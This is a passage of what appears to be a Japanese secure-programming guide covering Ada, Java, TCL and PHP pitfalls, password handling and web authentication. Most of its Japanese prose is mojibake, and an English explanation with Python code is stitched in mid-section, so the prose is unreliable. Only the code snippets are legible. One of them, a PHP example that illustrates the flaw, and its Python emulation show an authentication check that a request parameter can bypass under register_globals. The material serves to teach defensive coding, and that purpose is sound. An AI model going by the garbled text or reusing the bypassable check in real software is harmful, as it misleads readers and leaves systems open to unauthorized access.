[Uɂ܂܂ȏsłȂ悤ɂVFłBړÍA[U
ɂꂽvO𓮍삳邱ƂłBtVF́AO
ɂ͔OiƂĂ͗LłAmɐݒłȂ̂͗LŁA
肵Ă悭jĂ܂܂BƂΐtVFɂ́At@C(
Ƃ΁Au.profilev)ɐȂԂŎsĂA삷̂
܂B[Ũt@CύXł΁ÃR[hsĂ
܂܂BtVF́Aꂽ̃vOs悤
ɐݒ肷ׂłBÃvÔǂꂩuVFGXP
[vvgāA[UɃvO𓮂悤ɂȂĂ΁A
U҂͂̃VFGXP[v𗘗pĐtVFĂ܂
BAtVF PATH ݒ肵ĂȂ(ǂȃvO
̓)AU҂̓vȎŃVFGXP[v𗘗pł
(eLXgGfB^⃁[[_[)B́AVF̖ړI
̃vO̎sɂ_łB̃vOA]łȂ
F߂Ă邩܂BVF́Ȃ̖h~ɂ͉܂
B

 

9.5. Ada

Ada95 ł́AUnbounded_String ^̕AString ^_łP[X
łBŔAKvɉĎIɃTCYς邽߂łB
ApX[h閧̂悤ȋ@̒l Unbounded_String ɂ͓Ȃ
BRA_vy[WGAɂ̒lX܂ŎcĂ܂
邩ȂłBꍇɂ́AString ^gāAothers
=> ' ' ̂悤ɁA萔łɏ㏑ĂB

 

9.6. Java

Java gĈSȃvOJĂȂA܂ŏ̃Xebv
(Java ̊wK)́AJava ̃ZLeBɂĂ 2 ̊bIȃeLXg
ǂނƂłB̃eLXǵAGong [1999] McGraw [1999](҂ɂ
ẮAɃZNV 7.1 Ă)B܂ASun eSȃR
[ĥ߂̃KChC http://java.sun.com/security/seccodeguide.html
ĂB Java ̃ZLeBfɂẴXChA http:/
/www.dwheeler.com/javasec ŎRɌ܂B McGraw [1998]킹
ĂB

F񂪊JĂ悤ȃAvP[V́A炩ɂ̂̂
ˑĂ܂BNCAgł̗pړIɂ Java ̃R[h́AT
[õR[hȏɂ܂قȂ(ƐMf)ɂ܂B
ʌ͓Kpł܂BƂ΁AMłȂ[U̓͂ɑ
ẮA̓͂`FbNătB^Ȃ΂܂B
AJava ł́uBꂽv͂ALŘ_悤ȔzׂݓIȓ͂
݂܂B Johnathan Nightingale [2000] ɂ́AJava vO~Oɂ
ۑv񂵂Lq[A낢ƏĂ܂B

   
    c Java vO~Oő厖Ȃ̂́ApɋC邱ƂłBe
    ̃\bhC^tF[XAẽC^tF[XpȂAR
    [hɌJ댯܂B
   
L[ƂȂKChC Gong [1999] McGraw [1999]ASun ̃KC_X
AĎǧo炢炩Ă݂܂B

 1. public ȃtB[h͕ϐ́AgȂłBprivate Ő
    āAւ̃ANZX@\񋟂AĂ痘pĂ
    B
   
 2. \bh͑ɗRȂAprivate ɂĂ( private
    ɂȂȂAhLgɗRLڂĂ)B private ł
    \bh́AgŖh䂵Ȃ΂܂BȂȂA
    ꂽf[^󂯎邩Ȃł(ǂɂĖh䂷͂
    𐮂Ȃ)B
   
 3. JVM(Java Virtual Machine)́AANZVreBCq(Ƃ΁Au
    privatev) AvP[V(AvbgƂ͑ΏƓI)sɎۂ
    ͎{Ȃ\܂B̓_uSecure Programmingv[
    OXg 2000 N 11  7 ɎwEĂꂽ John Steven 
    (Cigital Inc.)Ɋӂ܂B̖́Aǂ̃NX̃[_[AA
    NZXvNX[h邩ɍE_ɂ܂BN
    XMłNX̃[_[(null ͊NX̃[_[
    ܂) 烍[h΁AANZX`FbŃu^vԂ܂(ANZ
    X)BƂ΁AL̂悤ɓ삵܂B (ȂƂASun 
    1.2.2 VM ł́B̎ł͓삵Ȃ܂)B
   
     a. public tB[h]҃NX(V)ARpC܂
        B
       
     b. ̃tB[hɃANZXuUҁvNX(A)ARp
        C܂B
       
     c. V  public tB[h private ɕύXāAăRpC܂
        B
       
     d. A 𓮂܂BA  V (݂ private )tB[hɃANZ
        X܂B
       
    AAvbgł͏󋵂ς܂B A AvbgɕϊAA
    vbgƂē삳(Ƃ΁AAvbgEr[A[uE
    U)ANX[_[́A͂Mꂽ( null) NX̃
    [_[ɂȂĂ܂B܂AR[h́A
    java.lang.IllegalAccessError ɓANX A  V.secret t
    B[hɃANZX悤ƂĂAƂbZ[Wo܂B
   
 4. static tB[h̕ϐ͎gȂłB̂悤ȕϐ̓NX
    ɑ܂(NXECX^Xł͂Ȃ)BāANX͑̃N
    XɂĈʒuÂāAstatic tB[h̕ϐ͑̂ǂ̃NX
    悤ɂȂ܂BȂĂ܂ƁASɂ̂܂
    ܂Ȃ܂B
   
 5. R[hɈӂ邩ȂꍇAmutable IuWFNgĕ
    Ȃ悤ɂĂ(R[h mutable IuWFNgύXĂ
    ܂Ȃ)Bz mutable ł邱ƂɒӂĂ
    (z̒g mutable łȂĂł)BāA@f[^
    zւ̎QƂ͕ԂȂłB
   
 6. [Ům mutable ȃIuWFNg(IuWFNg̔z܂)
    Ă̂܂ܕۑȂłBȂƁA[UIuWFNg
    SKvƂȂR[hɓnĂ܂܂BSKv
    R[h́ÃIuWFNgu`FbNvÃf[^gȂ
    AύXĂBz͓ŕۑOɃRs[āAӐ[
    Ă(Ƃ΁A[U쐬Rs[E[`ɂ͒ӂ
    )B
   
 7. ɗȂłBĂȂIuWFNg蓖
    @́A܂B
   
 8. ɗRȂ΁AׂĂ final ƂĂBNX̓
    \bh final łȂƁAU҂댯vȂ@Ŋg
    Ƃ邩܂BƁAZLeBƈɊg
    ]ɂȂ邱ƂYȂłB
   
 9. ZLeB́ApbP[W̃XR[vɗȂ悤ɂĂB
    ftHgŕĂ java.lang ̂悤ȃNX͏łBJava
    Virtual Machine(JVM)ɂ́ÃpbP[W悤Ƃ̂
    ܂BłȂ΁AJava ̃NX͕Ă܂B܂AU
    ҂͐VNXpbP[Wɓ邱ƂŁA̐VN
    XgāAh䂵ĂƎvĂIuWFNgɃANZXłĂ
    ܂܂B
   
10. inner NXgpȂłB inner NXoCgR[hɕ
    ƁAinner NX̓pbP[W̒̂NXANZ
    XłNXւƕϊĂ܂܂BɈƂɁANX
    vCx[gȃtB[h͂ނƈÖق private ł͂ȂȂA
     inner NX̃ANZXF߂Ă܂܂B
   
11. ŒɂĂBł邾Aʂȃp[~bV܂
    KvƂȂ悤ɂĂB McGraw ́Aɓݍ
    AǂȃR[hɂȂ悤ɐĂ܂B͂ăR[h
    ɏĂ܂(ƁA[Uu( )̈ꗗ
    lR[hs\vƂIł܂)B
    Aݒ肷Th{bNX̂̂KvƂ悤AvO
    ĂBɓKvȂAƂ킯
    ̃R[hčĂB
   
12. R[hɏȂ΂ȂȂA1 ̃A[JCut@Cɂ
    Ă[߂ĂB McGraw [1999]p̂K؂ł̂ŁA
    Lɍڂ܂B
   
       
        ̋K̖ړÍAقȂigݍ킹UhƂɂ
        ܂B̍ÚAU҂ӂR[hƏς݂̃NX
        ɃNAӐ}IɐΈꏏɎgƂȂ悤ɍ
        ς݃NXƃN肵āAVAvbg⃉Cu
        \z悤Ƃ܂BNX̃O[vɂ킹ď
        A̍UɍɂȂ܂BR[hɏs̃VX
        eł́A\ɈَȂ̂gݍ킹UɑΏł܂B
        Ă̋ḰÂ悤ȍUSɂ͖h؂܂B
        AA[JCu 1 ɂĂ΁AŌ͎󂯂܂B
       
13. NXłȂ悤ɂĂB Java IuWFNg𕡐
    dǵ݂ARXgN^ȂĂAU҂NX̃C
    X^X쐬łĂ܂܂BNX𕡐łȂ悤ɂ邽
    ߂ɁANXꂼŉL̃\bh`ĂB
   
    public final Object clone() throws java.lang.CloneNotSupportedException {
       throw new java.lang.CloneNotSupportedException();
       }
   
    ǂĂNX𕡐\ɂKvȂAU҂
    \bhĒ`łȂ悤ɂ@܂Bŕ
    \bh`ĂȂAfinal ɂĂB`Ă
    ȂAȂƂLǉāAӂI[o[Chh܂
    B
   
    public final Object clone() throws java.lang.CloneNotSupportedException {
      return super.clone();
      }
   
14. NX̓VACYłȂ悤ɂĂBVACY
    AU҂ private ȕłĂAIuWFNg̓Ԃ
    悤ɂȂ܂Bhɂ́Ã\bhNXɒǉĂ
    B
   
    private final void writeObject(ObjectOutputStream out)             
      throws java.io.IOException {                                     
         throw new java.io.IOException("Object cannot be serialized"); 
      }                                                                
   
    VACY\ȏꍇAtB[hVXẽ\[X𒼐ڈ
    ĂAAhXԂɊ֘A܂ł肷ȂÃt
    B[h transient ݒ肷悤ɂĂBȂƁAN
    XfVACYƕsK؂ȃANZXF߂邱ƂɂȂ邩
    ܂B@̏ transient łƌȂĂǂƎv܂B
   
    ŃNXɃVACY郁\bh`ȂAǂ
    DataInput  DataOutput \bhɂznׂł͂܂
    B{IȗŔADataInput  DataOutput \bhAI[o[
    Ch\łBVACYłNX private Ȕz𒼐
    DataOutput(write(byte [] b)) \bhɓnƂƁAU҂
    ObjectOutputStream TuNX write(byte [] b)\bhI
    [o[ChAprivate ȔzɃANZXACł
    ɂĂ܂܂BftHg̃VACÝAprivate ȃoCgz
    tB[h DataInput  DataOutput ̃oCgz񃁃\bhɌJ
    ܂B
   
15. NXfVACYȂłBNXVACYĂ
    ȂĂAfVACYł邩܂BU҂D݂̒l
    ꂽoCgV[PXāANX̃CX^XƂăfVA
    CYł܂BςƁAfVACY͈ public ȃR
    XgN^ŁAU҂IuWFNg̏ԂIł悤ɂ܂B
    ͖̑炩Ɋ댯łBhɂ́AL̃\bhNX
    ɒǉĂB
   
    private final void readObject(ObjectInputStream in)                
      throws java.io.IOException {                                     
        throw new java.io.IOException("Class cannot be deserialized"); 
      }                                                                
   
16. OŃNXrȂłBU҂́Aǂ݂̂OŃN
    X`ł܂BӂȂƁÃNXɖ]܂Ȃ
    ^Ă܂A܂Bł́AԈƂāAIuW
    FNgm̃NXǂ𔻒fڂĂ܂B
   
      if (obj.getClass().getName().equals("Foo")) {             
   
    2 ̃IuWFNgAԈႢȂNXłƔfKv
    ΁A getClass()𗼎҂ɂĂA== ZqŔrĂB
    ܂肱̂悤ɂȂ܂B
   
      if (a.getClass() == b.getClass()) {                       
   
    IuWFNgm̃NX{ɎĂ邩ǂ߂Kv
    ȂAێqKɁAK݂̖O(gĂNX̃N
    X[_[)Ŏg悤ɂĂBL̂悤Ȍ`gĂ
    B
   
      if (obj.getClass() == this.getClassLoader().loadClass("Foo")) {
   
    ̃KChC McGraw  Felten ̃hLg̈p
    B̃KChC͗DĂ܂B͂ɉMāANX̒l
    ɂr͂ł邾̂łƂ܂BKv
    ȂƂĂANX\bhC^tF[X݌vK
    ؂łB݌v͖̂Ȃ̂ŁÃeNjbNm
    ĂƖɗ܂B
   
17. @(ÍpX[hAASY)R[hf[^ɕۑ
    ȂłB JVM ɂ͊ȒPɂ̃f[^Ă܂D܂Ȃ
    ̂܂BR[h𕡎GɂĂA͂U҂ɂ̓R[h
    BĂ܂B
   
 

 

9.7. TCL

TCĹAutool command languagev̗ŁAueBNvƌĂт܂B TCL
́AƃCu 2 ̕\Ă܂B̓Vv
eLXgłBR}hĂяoāAΘbIȃvO𓮂̂
ĂA{IȃvO~O@\Ă܂BCúAA
vP[VvOɑgݍ܂܂B

TCL ɂĂ̏͂ɁA TCL WWW Info <http://www.sco.com/
Technology/tcl/Tcl.html> ̂悤ȃTCg̃y[WŌ܂Bɋ
[̂́ASafe-TCL(TCL ŃTh{bNX) Safe-TK (Safe-TCL p
Th{bNXڐÂ GUI)łB WebWiseTclTk Toolkit
 TCL pbP[WIɔzu WWW ̂ǂł[hł
ɂĂ܂B WebWiseTclTk Toolkit ɂẮA http://
www.cbl.ncsu.edu/software/WebWiseTclTk. ɂɏڂ񂪂܂B
ǂ̒xR[hr[Ă̂A͂肵܂Bɖ𗧂
񂪁Acomp.lang.tcl  FAQ http://www.tclfaq.wservice.com/tcl-faq ɍ
Ă܂B TCL ڎwĂƂ낪AAuVvv
ł䂦ɁAvȏɐ܂B Richard Stallman ́u
Why You Should Not Use TCLv <http://sdg.lcs.mit.edu/~jchapin/6853-FT97
/Papers/stallman-tcl.html> ĂBƂ΁ATCL ͊TOAf[
^^ 1 ݂()Aꂪ܂܂ȃvO̍쐬
Ă܂(sxȂĂ܂)B܂A TCL vO
ɂ킩Ƃ܂B́Aӂ͕ɂāAȒP
vOŎvȂĂ܂_łBƂ΁AU
͂Ȃ TCL vO𗘗pāA\ȂƂsĂ܂
܂B\ȂƂƂ́ATCL ɂƂēʂȈӖ
łXy[XdpAʁAhLAuPbg𑗂
Ƃł(́Aɂ̕𔭐͂쐬܂)B
܂AZLeB̋EɈʒuāAȂ΂ȂȂvO
̂ɂ́ATCL 𐄏ł܂BǂĂ TCL IтȂA
S̒ӂ𕥂āA[U̓͂ɂăvOu܂Ȃv悤
ɂĂB̈ŁATCL vOoCpR[h
̂ɑSRpłȂAƂR(s\ȃr[ȊO)𗝉ł܂
Bȏ TCL ̗pxĂl܂B
TCL Th{bNXoŎĂ鐔Ȃ 1 
B

 

9.8. PHP

SecureReality ́AɋuA Study In Scarlet - Exploiting
Common Vulnerabilities in PHPv[Clowes 2001]vƂhLgo
ĂāAPHP 4.1.0 ȑÕo[WɃ^[Qbg𓖂āASȃvO
ŖƂȂ_̂_Ă܂B̃hLgł́u
w͂ƂĂAPHP ňSȃAvP[V͔̂ɓ
(PHP ̃ftHg̐ݒł)vƌ_ÂĂ܂B

ǂȌɂZLeB̖͂܂APHP ɂ͈Sエ炭
̑唼̌Ɣׂčۂ_ 1 ܂B͖OԂɃf
[^[h@łBftHg PHP (o[W 4.1.0 ͂
Âo[W)́A Web  PHP ւƑϐƂ̒l
ׂāAIɓO (O[oϐ)Ƀ[h܂Bʏ̕ϐ
Ƀ[h܂BāAU҂͎Rɕϐ₻̒lݒ\
ŁAPHP vOčĐݒ肵ȂA̒l͂̂܂܂ɂȂĂ
܂B PHP ͍ŏɕϐvɁAftHg̒l
肵܂BāAPHP vO͕ϐȂ̂ʂłB
ϐݒ肷̂YƁAPHP ͕񍐂܂AftHgł͂
ȂĂ܂BYĂ͂Ȃ_́AꂪPɃG[̕񍐂ł
āAU҂ʂłȂ@āAG[NƂ~߂Ȃ
ƂłB܂ PHP ̓ftHgł́AvOU҂ɑ΂ēʂ
ӂ𕥂čU҂𕉂ȂAvOɂϐׂĂ̒l̃R
g[SɋĂ܂Ă܂BvOƁA
̕ϐĐݒł܂Aǂ̕ϐ̍ĐݒɎsĂ(͂ƂĂ
ȂĂ) PHP vO̐ƎコɂȂł傤B

Ƃ΁AL PHP vO(Clowes ɂ)́ApX[hm
Ălɂdvȏ^悤ƂĂ܂AU҂ Web u
EUŁuauthvɒlݒ肵AF؃`FbŇ͂킹܂B

 <?php
  if ($pass == "hello")
   $auth = 1;
  ...
  if ($auth == 1)
   echo "some important information";
 ?>

̑ɂÂƂ킯댯Ȗᔻl吨܂BPHP ͍L
ɎgĂ̂ŁA͐[łBǁAȒPɎg錾́AȒPɈ
SȃvO悤ɂȂĂ܂B PHP ł́A݌vɌʂ
Ă܂̋@\𖳌ɂł܂Buregister_globalsvuoffvɂ
΂悢̂łBAPHP  4.1.0 Vo[Wł́AftH
gŁuonvɂȂ܂B4.1.0 ȑO register_globals  off ɂĎgp
͍̂łB PHP ̊J҂́APHP 4.1.0 ̃AiEX̒ŉL̂悤
ɏqׂĂ܂BuPHP ̎̏W[Eo[WAbvł́AftH
g register_globals  off ɂȂăCXg[܂v

uregister_globalsvuonvɂȂĂ PHP ́AdvȃvOɂƂ
Ċ댯ȑIƂȂ܂BƂȒPɈSłȂvO邩
BAuregister_globalsvuoffvɂȂ肳΁APHP ͊J
̂ɂȂȂg錾ɂȂ܂B

ftHgSɂɂ́Auregister_globalsvuoffvɂ邱ƁA
[UȌ񌹂瓾͂ɑ΂ĐݒsA₷ł
@\ǉ邱Ƃ܂B Web T[o(Apache ̂悤)́A
 PHP Sɐݒ肵ăCXg[ł܂B[U󂯎肽
ϐȒPɃXgAbvł悤ȃ[` PHP Cuɓ
܂B֐ɂ́AϐȂ΂ȂȂp^ѕϐ
΂ȂȂ^`FbN̂܂B̍lł́AAS
 Web J PHP ̗p̂͂ǂƎv܂ (register_globals 
on Ȃ̂)BAƂC΁A育ȎiɂȂ܂B
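The flaw in the PHP snippet above, and the hardened handling the surrounding paragraphs call for (initialise every variable, read inputs explicitly through a helper that enforces a type and a length), as an added example in Python; it is not the page's code and not PHP. The handler functions, `get_param`, the request dicts and the password "hello" (taken from the page's snippet) are constructed for illustration. The first handler emulates what `register_globals = on` does: every request parameter exists as a variable before the script's first line runs, so a stray `?auth=1` satisfies the check without the password.

```python
"""Added example (not from the page or from PHP): emulates, in Python, the
register_globals hazard in the page's PHP snippet, beside a hardened handler.
The request dicts and the password "hello" are constructed for illustration."""

from typing import Any, Optional

SECRET_PASSWORD = "hello"                   # the page's example password
IMPORTANT = "some important information"    # the page's protected string


def get_param(request: dict, name: str, kind: type = str,
              *, max_len: int = 256) -> Optional[Any]:
    """Hypothetical 'stripping' helper: fetch one named parameter, enforce
    a length bound and a type conversion, return None when absent/invalid."""
    raw = request.get(name)
    if not isinstance(raw, str) or len(raw) > max_len:
        return None
    try:
        return kind(raw)
    except (TypeError, ValueError):
        return None


def handle_register_globals_on(request: dict) -> str:
    """Mirrors PHP with register_globals=on: every request parameter is
    already a variable before the script's first line executes."""
    env: dict = dict(request)               # attacker chooses these names
    if env.get("pass") == SECRET_PASSWORD:
        env["auth"] = 1
    # PHP's loose comparison makes the string "1" equal to the integer 1.
    if env.get("auth") in (1, "1"):
        return IMPORTANT
    return ""


def handle_hardened(request: dict) -> str:
    """Same logic with every variable initialised first and inputs read
    explicitly through get_param(); a stray ?auth=1 has no effect."""
    auth = 0
    password = get_param(request, "pass", str, max_len=64)
    if password == SECRET_PASSWORD:
        auth = 1
    if auth == 1:
        return IMPORTANT
    return ""
```

The hardened version is what `register_globals = off` plus explicit reads from the request arrays gives you: the only way `auth` becomes 1 is through the password comparison, whatever names the client sends.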

PHP gƌ߂ȂAŃAhoCXĂ܂(
̃AhoCX̑́AClowes NĂւ̑Ώ@x[X
ɂĂ܂)B

 E PHP ̐ݒIvVłuregister_globalsvuoffvɂāA
    4.1.0 ȏ̃o[W𗘗pĂB PHP 4.1.0 ł͂
    ʂȔzpӂĂāA̒ł $_REQUEST ́uregister_globalsv
    uoffvɂĂꍇ PHP ł̃\tgEFAJeՂɂ܂B
    register_globals ݒ肷邱ƂŁAPHP ɑ΂Ԃ悭U
    Sɔrł܂B܂̐ݒ肪VKCXg[̃ftHgɂȂ
    ̏ɂȂ܂B register_globals  off ł邱ƂOɂ
    ȂA܂̓_`FbNKv܂(ȂĂȂ
    f܂)B΁AvOCXg[lA肪
    邱ƂɂCt܂BT[hp[eB PHP AvP[Vł
    ݒœ삷̂͏łBČł́AWeb TCgŊS
     off ɂ͍̂ł邱ƂYȂłB܂Au
    register_globalsv𖳌ɂƁAT[hp[eBɂzXeBO
    Ȃ܂BvÔuregister_globalsv
    uoffvɂĂ邱Ƃ͉\łBƂ Apache ȂAL̍s
    PHP ̃fBNg .htaccess t@CɉĂ(
    Directory ߂gĂɐĂ)B
   
     php_flag register_globals Off
     php_flag track_vars On
   
     .htaccess t@ĆAApache  Web T[oݒ̏㏑
    ĂȂ΁AɂȂ܂BApache Ŝ̐ݒ
    AllowOverride  None Ɛݒ肳Ă̂ʂłB
    Apache [UȂ΁AWeb ̃zXeBOET[rXɑ΂āAu
    AllowOverride IvVvݒt@Cɐݒ肷悤ɐĂ
    ĂBłȂAwp[֐āAKvȃf[^(
    f[^)̂܂܃[hĂB
   
 E register_globals  on ɂȂēĂƎvƂŁA\tg
    EFAJȂ΂ȂȂȂ(Ƃ΁Aɑ݂ PHP
    AvP[V)A[Uݒ肵ĂȂlɐݒ肷悤ɂ
    B PHP ̃ftHglOɂȂłB܂Ŋm
    ɐݒ肵ϐłȂ΁AMpĂ͂܂BɂȂǂ̕
    łAsȂ΂܂ (Ƃ PHP vO PHP
    g HTML t@Cׂ)BőP̉́APHP vOꂼ
    ɑ΂āAgpϐׂĂɒlݒ肷邱ƂłB
    ʂ̃ftHgl(""  0)Đݒ肷ƂĂłBɂ́As
    ɕKv include t@CɓĂO[oϐ⃉Cu
    ׂĂɂĂ͂܂܂Bɂ̓_AĂs邱Ƃ
    ɂĂ܂B́AJ҂̒łׂẴO[oϐ
    Ă̊֐痘p邩ȂƂ_{ɒmĂāA
    ĂlȂłB@łAHTTP_GET_VARS
     HTTP_POST_VARSAHTTP_COOKIE_VARSA HTTP_POST_FILES {oA
    [Uf[^pӂĂ邪AvO}̏񂷂ׂĂ`Fb
    NYĂȂ܂B܂ PHP Vf[^ǉ
    ƉN邩܂(Ƃ΁AHTTP_POST_FILES ͌Âo[W
    ɂ͂܂)B
   
 E G[񍐂̃x E_ALL ɐݒ肵āAׂẴG[eXgɕ
    悤ɂĂB肱̕񍐂ɂ́AĂȂ
    ɂĂ̌x܂Bꂪ PHP ł͏dvȖɂȂ܂B
    ɂ PHP g͂߂ȂA͗ǂlłBȂȂvO
    fobÔɂ𗧂łBG[񍐂̃xݒ肷
    ̂ɂ́A낢ȕ@܂Buphp.inivt@C(S)
    u.htttpd.confvt@C(zXg 1 )Au.htaccessvt@C(z
    Xg)A̓XNvg̃gbvxŁAG[񍐊֐ʂčs
    Ȃ܂BG[񍐃x̐ݒ@́Aphp.ini t
    @Cƃgbvx̃XNvgŐݒ肷@łB
    A(1)gbvx̃XNvgɃR}hY(2)vO
    ʂ̃}VɈړ php.ini t@CύXYAƂƂh
    ܂B܂ PHP vOꂼꂪAL̂悤ɂ͂܂ׂ
    B
   
      <?php error_reporting(E_ALL);?>
   
    G[̕񍐂́AJɗLɂA{Ԃ̃TCgł͖ɂׂł
    AƂ_ɂĂ͋c_̗]n܂(̂悤ȃG[EbZ
    [W͍U҂ɂƂĖɗ񋟂\邩ł)B
    Ȃ̂́Au^pvɖɂÂ܂܂̏ԂŊJ
    ɂĂƂłBāAʂ͒PȃAv[`āAJ
    A{Ԃꂼ̂͂܂ɓ邱Ƃ𐄏܂B
   
 E t@C쐬̂Ɏg郆[ÚAǂӐ[tB
    ^ĂBƂ킯[gt@Cւ̃ANZX͖hł
    B PHP ̓ftHgŁu[gt@Cv@\Ă܂B
    Afopen() ̂悤ȃt@CI[vR}h݂Ă܂
    B̌ꂪ[Jt@CI[vł̂ɑ΂āÃT
    Cg Web  ftp ̗vĂяôɎۂ悭g܂B
   
 E PHP ̌Â`Ńt@C̃Abv[hȂłB
    HTTP_POST_FILES zƂɕt֐gĂB PHP ̓t
    @CAbv[ĥɁÃt@Cǂ̃e|̃f
    BNgɓ̖OŒuĂ܂B PHP ͂Aϐ̊񂹏W
    ߂ɑ΂ĐݒsAt@Cǂɂ邩܂BA
    U҂͕ϐ₻̒lRg[̂\Ȃ̂ŁA̋@\
    gāAƂłȂƂN܂B̂ɁAHTTP_POST_FILES
    Ƃɕt֐gāAAbv[hꂽt@CɃANZX
    ĂB̉@ƂĂAU҂ȓẽt
    @Ce|ŃAbv[hłĂ܂܂B͂ꎩ̊
    łB
   
 E hLgc[ɂ́Aیς݂̓ĂB
    ̃R[h (啔łׂł)́AhLgc[̊O
    uĂB PHP ͂̃gsbNXɂāAcOȕ񍐂ߋ
    날܂BX́APHP [Úu.incv(include)gqg
    Au܂܂vt@CT|[gĂ܂BÃt@C
    ɂ̓pX[h̏܂B܂ Apache ́u.incvt@C
    hLgc[ɂAv肳΁Av҂ɂ̓e
    ^Ă܂Ă܂B܂ŊJ҂́AׂẴt@CɁu.php
    vƂgqtĂ܂B͂̃t@CȂ
    Ӗ܂BAł͂Ȃt@CɂȂĂ
    ܂΁AƂĈpĂ܂܂Bqׂ悤ɁAZL
    eB̃AhoCXňԑ؂ȓ_́AłBhL
    gc[ɂ́Aیς݂̓(t@C)ĂB
    ̃R[h(Ƃ΁ACu)́AhLgc[̊OɒuĂ
    Bǂȁu.incvt@ChLgc[ɂ͓Ȃł
    B
   
 E ZbV@\ĂBuZbVv@\́A֗ɉiI
    ȃf[^ۑł܂A̎ɂ͖_񂠂܂B
    ܂AftHgł̓ZbV̓e|t@Cɏۑ
    BāA}`zXgȃVXełƁAU
    oɑ΂Č邱ƂɂȂ܂B̓}`zXgȃVXeł
    ȂĂAȂƂ܂B̏t@CVXe
    ł͂ȂAf[^x[XƁuRÂvƂ\łBAʂ̐l
    Ԃ}`zXgȃf[^x[Xœp[~bVŃf[^x[X
    ɃANZXłȂA͈ꏏłBCĂȂƞBɂȂ
    ܂(uZbVlȂ̂U҂ݒ肵lȂ̂킩Ȃ)AU
    ҂I񂾓ẽt@C⌮T[oɖ肨Ă܂Ƃ
    \łB͕ȏ󋵂łB܂AU҂͂xAt@C
    ⌮ǂɒuRg[邱Ƃ\łB
   
 E ͂ANZXĂ܂Ȃ̂Ap^ɏƂ炵킹Ăׂă`F
    bNĂ(Ɠ悤)BČ^ϊgāA
    ͂Ȃf[^Iɂׂ^ɂĂ܂ĂBuwp[
    v֐J΃`FbNȒPɂȂA(\z͈͓)͂I΂
    Xg荞߂܂B PHP ͌^̐񂪊ɂAꂪN
    ܂BƂ΁A̓f[^̒lu000vȂAu0vƂ͓Ȃ
    񂵁Aempty() Ȃ܂B͘AzzɂƂāAƂ
    dvłB̓CfbNX񂾂łB $data["000"]
    $data["0"]Ƃ͈ႤƂӖ܂BƂ΁A$bar  double ^ł
    ƊmFȂ΂܂(mF́A double ^ɂƂĂ̂݁A
    tH[}bgƂȂ܂)B
   
      $bar = (double) $bar;
   
 E 댯͂ł֐ɂ͓ɒӂ𕥂ĂB̊֐ɂ
    PHP R[h̎s(Ƃ΁Aexec() passthru()Abacktick ZqA
    system()Apopen())t@C̃I[v(Ƃ΁Afopen() readfile
    ()Afile())܂B͊ȃXgł͂܂B
   
 E K؂ȏꍇɂ́Amagic_quotes_gpc()gĂB낢ȍU
    r܂B
   
y󒐁Fł́AIuWFNgwXNvg Ruby ɂӂĂ܂
B󒐂ƂĊȒP Ruby ̂ƂɂӂꂽƎv܂B Ruby ɂ̓ZL
eBf݂Ă܂B傫킯 2 ̊댯ȃP[Xz肵Ă
܂B 1 ́AMłȂf[^ꍇA 1 ́AMłȂ
vOꍇłB̃P[XɑΉāAx 0  4 ܂ł
ZLeBEx $SAFE ƂO[oϐpăXbhPʂ
ݒł܂BӂĂ̂́AC ŏꂽgݍ݃C
uAgCuƂAׂẲ`FbNĂۏ؂
Ȃ_łB`FbN̂́A쐬҂ɂ܂Ă܂BZL
eBf̏ڍׂɂẮAuIuWFNgwXNvg Ruby t
@X}jAv́uZLeBfv <http://www.ruby-lang.org/
ja/man-1.6/?cmd=view;name=
%A5%BB%A5%AD%A5%E5%A5%EA%A5%C6%A5%A3%A5%E2%A5%C7%A5%EB> QƂĂ
z

 

Chapter 10. IȘb

                                    lɂ͂̌̐Ƃ 
                                    BmȎ҂ɂ͖m@ƂȂB 
                                                                       
                                          񐹏⼌ 16  22 (NIV)
 

10.1. pX[h

ł邾pX[hR[hOŏȂ悤ɂĂB
Ƀ[JȃAvP[V̏ꍇAʏs[ŨOCF؂ɂ܂
Ă܂悤ɂĂBAvP[V CGI XNvg̏ꍇA
Web T[opӂĂhɂł邾܂ĂB Web T
[oɂF؂̈ɂĂ͉LQƂĂBAvP[V
lbg[NoRŗp̂ȂAŃpX[h𑗂Ȃ
(ł邾)BƂ̂́Albg[N𓐒邱ƂŁAƂ
ȒPɉ肳āAŎgĂ܂łBpX[huÍv
ĂÄÍASYŌŒ̌gĂA̔
JASYgĂ肷ȂA{IɕŃpX[h𑗂
̂ƓłB

lbg[NŗpȂAȂƂ_CWFXgEpX[h̎gp
lĂB_CWFXgEpX[h̓nbVŐpX[h
łBʏ́AT[oNCAgɉf[^(Ƃ΁AtAԁAT
[o)𑗂ANCAg͂̃f[^ƃ[ŨpX[hgݍ킹
A̒l(u_CWFXgEpX[hvƌĂт܂)nbV܂B
ănbVʂ̂܂܃T[oɕԂ܂BT[o͂̃nbVl
؂܂B͂܂܂BƂ̂́ApX[h͂ǂȌ`ł
ۂɂ͑ȂłBpX[h̓nbVľƂĎg邾
łB_CWFXgEpX[h͕ʂ̈Ӗł́uÍvƂ͌Ȃ
̂ŁA@ŋ@p̈Íɐ݂Ă鍑łF߂Ă܂B
_CWFXgEpX[h́AڂĂUɂ͎ア̂łAlb
g[N̓ɑ΂Ă͗LłB_ 1 ɁA_CWFXgEpX[
h̓삪܂BT[o̓nbVĂȂpX[hׂĎ
Ȃ΂Ȃ炸AꂪT[oȖΏۂƂĖ͂̂ɂĂ
B

AvP[VŃ[UpX[hݒł̂ȂApX[h`
FbNāAuK؂ȁvpX[hĂ(ɍڂĂ
Aȏ̕łA)BK؂ȃpX[h̕t
A http://consult.cern.ch/writeup/security/security_3.html Ă͂
ł傤B PAM gȂ痘p܂傤B\ȃpX[h
@\T|[g邩łB

 

10.2. Web ̔F

Web ̐Eł Web T[o͒ʏ탆[UF؂̂ SSL  TLS 
gAT[oF؂Ă܂B[UNȂ̂̔F؂́AȒP
Ƃł͂܂B SSL  TLS ̓NCAg̔F؂łAۂɎg
pɓāAĂ܂(Ƃ΁AWeb uEU͋
ʂ̃[UF،`T|[gĂ炸A[UCXg[͖̂
|ł)B Java  Javascript gƁAꎩgɖ肪܂B
A[ȖɂĂAt@CA[EH[ɃtB^
肷邩łBāAǂ炩ƂƒxȂ܂BĂ̏
A[UɃvOCCXg[͔̂񌻎Ił܂B
AVXerI[UȂCglbgȂA̕@
K؂܂B

Cglbgp̃AvP[V\zĂȂAʏ͔F؃VXe
łA[UpĂ̂g悢ł傤B܂
A[U Kerberos ɈˑĂȂAVXe Kerberos g悤
ɐ݌vĂBF؃VXéAAvP[V̑̕Ɨ
ĂĂBgDƂ̂́ÂF؃VXeύX
Ȃł(ύX܂)B

eNjbNɂ́A@\ȂA삵Ă܂Ȃ̂
